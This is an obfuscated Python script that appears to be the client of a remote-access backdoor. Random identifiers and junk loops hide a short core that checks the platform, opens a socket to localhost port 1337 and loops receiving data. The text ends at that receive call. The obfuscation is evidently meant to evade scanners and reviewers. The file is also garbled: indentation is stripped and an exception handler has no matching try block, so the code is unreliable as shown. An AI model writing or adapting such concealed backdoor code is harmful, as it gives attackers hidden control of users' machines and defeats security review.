IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
from core.zMJIDSQBjssyEayGxDrxJGHzInFeSJvxzsGGSMSsCIHSEyiEAwPOFiAvyOoavMB import BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA, GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx
try:
luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG = 'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ'
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = 'JHnMUIJJzDAoOsXvEokGyCvBEtBIRXrCvBtISdhHHSNmprJrPPtnHxvlITPAjw'
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = 'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN'
qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr = 'RmBujycyGGlrBhsyFzTRmQjGSqENRSpTBsUIJCJvRDZvizFFztAxJRuPjvJoyPx'
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = 'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz'
DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr = 'POSmSiAvABGOYUXHQCbIMkYFOEBXIHGyIOPPjJHeHWHUyyuMirDSGUGIBDJDJEA'
GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx = [
'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ',
'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN',
'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz',
'uFFuUnxDtFEyzwmPMfXUvDksUDwQyqzwSITHJBRrFQjvvYRupIFEJeAORGnOBDB'
]
for luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG in DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr:
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX:
if qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr == vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG
elif vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx == nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
else:
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx:
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ
except Exception:
pass
except ImportError as GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = 'llzLJWoQkGzyxyEMTAiGFBrYPJVeyfSyyFHsxBnoulHsqHuwvwpLwUNGIJHPEtP'
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = 'tGwOEAyvIEJRHGtGfQHRyBSIIwGNezvJFHZOFtuFIswBlzqRvCQrvRSAMpnttEQ'
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = 'BSILrwBEqFQkIJQnDAIZXFptJoRqySDEAJIjJxyIvASQcCGvycjCFJwwQuINzJD'
wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL = 'jHBSHySpBDFYENyuHEAEaSCAfqupwwueyqnrFBDhpJvENIHJFnBAsAHWTvQXhuR'
UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE = 'sEJUWOIjxCAmPgznGsySvJGRMabExBodHSEpYAibNlHGtizyCzEvDySBMynDIPJ'
if vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
if vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL
elif vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG:
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT
if GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
print(GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR)
sys.exit(0)
nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ = sys.platform
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = 'GSFWuEAGpAwEklfuDJOHKOwEUzwHywxQAwGyjQIvErPvEwHzmzPBIoEywBPxDnD'
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = 'GDhDBJJCweBDssXFLvAuESSEyxRyhkDwpCuXRSWJqnGvMTAYRsTGRhOIEuGxPSu'
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = 'IvyEABRuRwIPLBAqCquBCHnHkkIBdYDmIrCDDTpPFAxAQltxusiTmuQERlPtCEz'
ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC = 'wGyHInFlnxGxXIhGZPEJSyPEJrDoNpVzANsPIyGrvGyHBGNJIAKBDBPZGHrrqHI'
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = 'ErBvASsGScEAQreHlMJFQJlDDmqDGsJOrHwsJVQgXSXiQSFGPHTNMGpieymHoCy'
xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW = 'vzNxwardqUroBkGVSRCupivMiFxsBzqSgSRvsrqGyyGDrGASQUGiJHCxClIJQqR'
if QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO != ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW != CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD
else:
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
if CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG == QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW == CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC = 'localhost'
RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG = 'XPnqyABHjboPmIHyJynQFQEExIGMwvRjrBBEtRlHklTFoIAyAPISuzEpJHFBvnZ'
uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX = 'hDmyQJfnfPLQsvHYrBwJHnBQKyQwRrQDYJJFEEiBAxrDSDTmBRLwjvDFAzstIzF'
hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE = 'JQtPSGuYgrxqIvOGxCGGcFCrFgFPRpXRzuHowHPHCyzGxBHSIMtwrEDBIDZzBRu'
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = 'pFRPrxMyBHwIsyexesMNaHoqyHPWonFpSBIAJGtDjFCFkAHESCHrHGuTiHsGgEB'
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = 'hSYYHPnSggRzIREQDQhRFEYQjAJEnIEBFtnJCRNwEJSnJRRvwGkBzXgcADdNkHO'
rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv = 'qCFzkFGQiBAYDJmvrHBCyRlrxlDwexJIPQtxRuIBFRDpIozeQIRDwHpJRxJIHmH'
if hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
for rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv in ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn:
if rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG
else:
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX
fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ = 1337
CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt = 'IOBSEEJLxPuJSpINpGHSqFuRGDWFHMbnJXDnGvMYGRymPTAGHHQQGNHsEhGozd'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
if CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT == sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT
else:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
CFRGQCPCzURSYHUgHlEFsBSnFqsWRJFJCLuvAijkNAfyFExtqWWAAuIDRGEQPsj = 'b14ce95fa4c33ac2803782d18341869f'
try:
ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw = 'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG'
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = 'CElERpyFSPuaRGkrCjStJgQQQtuoPCjCCSMrGmjFQZSGICVpBJVDHCqyOEDCOQE'
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = 'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU'
wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk = 'JBWBwJzDRqsEHuAqepJGIxDHZsPDPRpXiFHDBnHBsvzJPRHVSJAHEzsqJPQHQBx'
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = 'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ'
zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn = 'upyQIBBVSAnJraVqYzWvJGygDAuQkRVOIumwjGBHHmSJjAwHsqvRRICoMoRSzDi'
FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus = [
'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG',
'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU',
'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ',
'SztutxvJpQPSSAtDNrxDfTwWvHESskJxAhJBIeFJOCODlGoQFxPADJRzUMwmDyr'
]
for ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw in zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn:
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT:
if wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk == QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw
elif QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr == CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
else:
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus:
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG
except Exception:
pass
def rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF():
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE = socket.socket()
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.connect((CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC, fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ))
OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG = vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE)
while True:
try:
qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH = 'CPQIjOXUpICRzvDomHPpCuIwGmmBpaejPCNqktxIHJIucQSImDUDDzosxNBFByp'
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = 'HsIsIOIrYCFwxSDEUKIImTBfxBOzRoCqIDsOLrIPEBmQRZHhSyIuEBsvBBYSEJz'
nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB = 'PxQHAsApjsDMMxIFFGSFPSmyuaovEvQRzEDWQSSJExqvSAtHnyGQMAxISYPRSCo'
YQwEumOQzUvSBJRBMrquASQzvgMlyRwJqqGQSDQEHBQBCRhnPFFLBkAGwFPzHrE = 'DHuNRsuVQBRvSfQmlWxIHPiDJEJUHzNvJeJSRHRjWHonQDCGvyxUyEBxBqDDBCh'
PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh = 'ZFSKpRQjqSRQsIwndMBuGmJDXqIJwwQOMAPMlMXrwyzZBynDCDiJDvYsGEkgItE'
mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG = 'xSImhuEgIImqBqQruzNFQFiimJDmNSCoJDGyvgEHAolDzBSJiIiNmFxHSuzJDDk'
ysywJIQQxvRBHSJzRMpytrHFtWNmoJMNpsFSGOJCpGQkzFGiiPBJdwIWBRPSxCh = [
'CPQIjOXUpICRzvDomHPpCuIwGmmBpaejPCNqktxIHJIucQSImDUDDzosxNBFByp',
'PxQHAsApjsDMMxIFFGSFPSmyuaovEvQRzEDWQSSJExqvSAtHnyGQMAxISYPRSCo',
'ZFSKpRQjqSRQsIwndMBuGmJDXqIJwwQOMAPMlMXrwyzZBynDCDiJDvYsGEkgItE',
'FxzJRvGHoBetyDPZmyqTxPzvyJOPIwHwROCIZQFqjyPGtyQpHzAIzvISJIvewAc'
]
for qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH in mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG:
for XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE in nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB:
if YQwEumOQzUvSBJRBMrquASQzvgMlyRwJqqGQSDQEHBQBCRhnPFFLBkAGwFPzHrE == PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh:
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH
elif PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh == XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE:
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG
else:
PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh = mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG
for XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE in ysywJIQQxvRBHSJzRMpytrHFtWNmoJMNpsFSGOJCpGQkzFGiiPBJdwIWBRPSxCh:
nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB = XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE
except Exception:
pass
utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz = IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.recv(1024)
